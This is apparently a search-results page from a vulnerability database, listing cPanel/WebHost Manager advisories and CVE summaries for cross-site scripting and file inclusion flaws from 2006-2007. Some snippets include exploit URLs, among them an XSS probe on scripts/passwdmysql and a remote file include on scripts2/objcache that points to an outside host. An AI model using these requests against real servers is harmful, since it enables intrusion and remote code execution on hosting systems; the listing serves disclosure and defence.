3955 matches found
cPanel 10.9.x - 'Fantastico' Local File Inclusion
Fantastico In all Version Cpanel 10.x = local File Include to the Note : Preparations php.ini in Cpanel hypothetical and They also in all WebServer Must provide username And pass and login :2082 To break the strongest protection modsecurity & safemode:On & Disable functions : All NONE Vulnerable...
cPanel <= 10.9.x (fantastico) Local File Inclusion Vulnerabilities
No description provided by source. Fantastico In all Version Cpanel 10.x = local File Include to the Note : Preparations php.ini in Cpanel hypothetical and They also in all WebServer Must provide username And pass and login :2082 To break the strongest protection modsecurity & safemode:On & Disab...
Cross site scripting
Cross-site scripting XSS vulnerability in scripts/passwdmysql in cPanel WebHost Manager WHM 11.0.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the password parameter...
CVE-2007-0890
Cross-site scripting XSS vulnerability in scripts/passwdmysql in cPanel WebHost Manager WHM 11.0.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the password parameter...
CVE-2007-0890
Cross-site scripting XSS vulnerability in scripts/passwdmysql in cPanel WebHost Manager WHM 11.0.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the password parameter...
CVE-2007-0890
CVE-2007-0890 is an XSS vulnerability in cPanel WebHost Manager (WHM) up to version 11.0.0, in the scripts/passwdmysql component. The vulnerability allows remote attackers to inject arbitrary web script or HTML via the password parameter. The provided connected documents confirm the affected prod...
local bug :[xxs] in whm
vendor : cpanel version : all... by : s3rv3rhack3r my-web-sitez : www.hackerz.ir - ali.hackerz.ir exploit: http://dpmaon.com:2086/scripts/passwdmysql?password=xss&user=root&submit=Change+Password...
Remote file inclusion
Remote file inclusion vulnerability in scripts2/objcache in cPanel WebHost Manager WHM allows remote attackers to execute arbitrary code via a URL in the obj parameter. NOTE: a third party claims that this issue is not file inclusion because the contents are not parsed, but the attack can be used...
CVE-2007-0854
Remote file inclusion vulnerability in scripts2/objcache in cPanel WebHost Manager WHM allows remote attackers to execute arbitrary code via a URL in the obj parameter. NOTE: a third party claims that this issue is not file inclusion because the contents are not parsed, but the attack can be used...
CVE-2007-0854
CVE-2007-0854: Remote file inclusion vulnerability in scripts2/objcache of cPanel WebHost Manager (WHM). An attacker can use a URL in the obj parameter to cause arbitrary code execution or overwrite files under /var/cpanel/objcache, potentially yielding unexpected web content. Some sources note t...
CVE-2007-0854
Remote file inclusion vulnerability in scripts2/objcache in cPanel WebHost Manager WHM allows remote attackers to execute arbitrary code via a URL in the obj parameter. NOTE: a third party claims that this issue is not file inclusion because the contents are not parsed, but the attack can be used...
remote file include in whm (all version)
name : web host manager vendor : cpanel.net by : s3rv3rhack3r ali at hackerz dot ir web-site : www.hackerz.ir - ali.hackerz.ir exploit: http://domain.com:2086/scripts2/objcache?obj=http://www.hackerz.ir/?...
cPanel 11 - PassWDMySQL Cross-Site Scripting
cPanel 11 - PassWDMySQL Cross-Site Scripting source: https://www.securityfocus.com/bid/22474/info cPanel is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in...
cPanel 11 - PassWDMySQL Cross-Site Scripting
source: https://www.securityfocus.com/bid/22474/info cPanel is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the...
CVE-2006-6566
PHP remote file inclusion vulnerability in includes/profilcpconstants.php in the Profile Control Panel CPanel module for mxBB 0.91c allows remote attackers to execute arbitrary PHP code via a URL in the modulerootpath parameter...
CVE-2006-6566
CVE-2006-6566 affects mxBB 0.91c, specifically the Profile Control Panel (CPanel) module. The vulnerability is a PHP remote file inclusion in includes/profilcp_constants.php that allows an attacker to execute arbitrary PHP code by supplying a URL in the module_root_path parameter. This is a remot...
CVE-2006-6548
Multiple cross-site scripting XSS vulnerabilities in cPanel WebHost Manager WHM 3.1.0 allow remote authenticated users to inject arbitrary web script or HTML via the domain parameter to 1 scripts2/changeemail, 2 scripts2/limitbw, or 3 scripts/rearrangeacct. NOTE: the feature parameter to...
CVE-2006-6548
Multiple cross-site scripting XSS vulnerabilities in cPanel WebHost Manager WHM 3.1.0 allow remote authenticated users to inject arbitrary web script or HTML via the domain parameter to 1 scripts2/changeemail, 2 scripts2/limitbw, or 3 scripts/rearrangeacct. NOTE: the feature parameter to...
CVE-2006-6548
The CVE-2006-6548 entry describes multiple cross-site scripting (XSS) vulnerabilities in cPanel WebHost Manager (WHM) 3.1.0. Affected component: WHM 3.1.0. Vulnerable vectors: the domain parameter in several scripts (scripts2/changeemail, scripts2/limitbw, scripts/rearrangeacct). The issue allows...
CVE-2006-6523
Cross-site scripting XSS vulnerability in mail/manage.html in BoxTrapper in cPanel 11 allows remote attackers to inject arbitrary web script or HTML via the account parameter...